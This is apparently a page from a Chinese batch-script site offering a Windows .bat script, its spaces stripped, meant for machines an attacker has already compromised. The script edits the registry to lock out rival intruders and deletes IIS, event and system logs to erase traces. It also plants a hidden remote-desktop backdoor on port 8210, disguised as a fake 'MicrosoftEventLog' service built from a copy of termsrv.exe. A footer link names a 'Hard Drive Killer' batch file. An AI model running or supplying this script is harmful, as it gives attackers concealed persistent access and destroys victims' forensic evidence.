------------------------cutherethensaveas.bator.cmdfile---------------------------@echoWindowsRegistryEditorVersion5.00>patch.dll@echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>>patch.dll@echo"AutoShareServer"=dword:00000000>>patch.dll@echo"AutoShareWks"=dword:00000000>>patch.dll@REM[禁止共享]@echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]>>patch.dll@echo"restrictanonymous"=dword:00000001>>patch.dll@REM[禁止匿名登录]@echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]>>patch.dll@echo"SMBDeviceEnabled"=dword:00000000>>patch.dll@REM[禁止及文件访问和打印共享]@echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\@REMoteRegistry]>>patch.dll@echo"Start"=dword:00000004>>patch.dll@echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule]>>patch.dll@echo"Start"=dword:00000004>>patch.dll@echo[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon]>>patch.dll@echo"ShutdownWithoutLogon"="0">>patch.dll@REM[禁止登录前关机]@echo"DontDisplayLastUserName"="1">>patch.dll@REM[禁止显示前一个登录用户名称]@regedit/spatch.dll------------------------cutherethensaveas.bator.cmdfile---------------------------下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnalservice留跳后路。@regedit/spatch.dll@netstopw3svc@netstopeventlog@delc:\winnt\system32\logfiles\w3svc1\*.*/f/q@delc:\winnt\system32\logfiles\w3svc2\*.*/f/q@delc:\winnt\system32\config\*.event/f/q@delc:\winnt\system32dtclog\*.*/f/q@delc:\winnt\*.txt/f/q@delc:\winnt\*.log/f/q@netstartw3svc@netstarteventlog@rem[删除日志]@netstoplanmanserver/y@netstopSchedule/y@netstopRemoteRegistry/y@delpatch.dll@echoTheserverhasbeenpatched,Havefun.@delpatch.bat@REM[禁止一些危险的服务。]@echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp]>>patch.dll@echo"PortNumber"=dword:00002010>>patch.dll@echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp>>patch.dll@echo"PortNumber"=dword:00002012>>patch.dll@echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]>>patch.dll@echo"Start"=dword:00000002>>patch.dll@echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]>>patch.dll@echo"Start"=dword:00000002>>patch.dll@echo"ErrorControl"=dword:00000001>>patch.dll@echo"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\>>patch.dll@echo74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\>>patch.dll@echo00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00>>patch.dll@echo"ObjectName"="LocalSystem">>patch.dll@echo"Type"=dword:00000010>>patch.dll@echo"Description"="Keeprecordoftheprogramandwindowsmessage。">>patch.dll@echo"DisplayName"="MicrosoftEventLog">>patch.dll@echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice]>>patch.dll@echo"Start"=dword:00000004>>patch.dll@copyc:\winnt\system32\termsrv.exec:\winnt\system32\eventlog.exe@REM[修改3389连接,端口为8210(十六进制为00002012),名称为MicrosoftEventLog,留条后路]
上一篇:
Hard Drive Killer Pro Version 4.0(批处理)_程序数据_windows批处理 下一篇:
删除win2k/xp系统默认共享的批处理_程序数据_windows批处理
